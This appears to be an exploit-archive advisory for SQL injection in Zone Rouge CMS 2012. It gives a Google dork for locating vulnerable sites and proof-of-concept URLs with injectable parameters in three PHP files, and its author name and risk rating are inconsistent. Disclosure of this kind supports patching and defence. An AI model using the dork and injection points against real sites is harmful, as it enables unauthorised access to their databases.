Zone Rouge CMS 2012 SQL Injection Vulnerability

2012.01.22

Credit: Victor Frankenstein

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: [inurl:\"driver.php?langue=\"]

# Exploit Title: [Zone Rouge CMS 2012 - SQL Injection Vulnerability]
# Google Dork: [inurl:"driver.php?langue="]
# Date: [2012-01-21]
# Author: [David Frankenstein]
# Software Link: [http://zonerouge.fr]
# Version: [#]
# Tested on: [#]

# Exploit:

Vulnerable File(s):
                                                           [+] driver.php
                                                           [+] photos.php
                                                           [+] release.php


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without user inter
action.
For demonstration or reproduce ...

PoC:
[+] driver.php?langue=fr&champ=`[SQL-Injection]
[+] photos.php?langue=fr&archives=`[SQL-Injection]
[+] release.php?langue=fr&champ=`[SQL-Injection]



Reference(s):
[+] http://[SERVER].COM/[FILE].PHP?langue=fr&archives=`%60


Risk:
=====
The security risk of the remote sql injection vulnerability is estimated as
high(+).

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zone Rouge CMS 2012 SQL Injection Vulnerability

Dork: [inurl:\"driver.php?langue=\"]

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.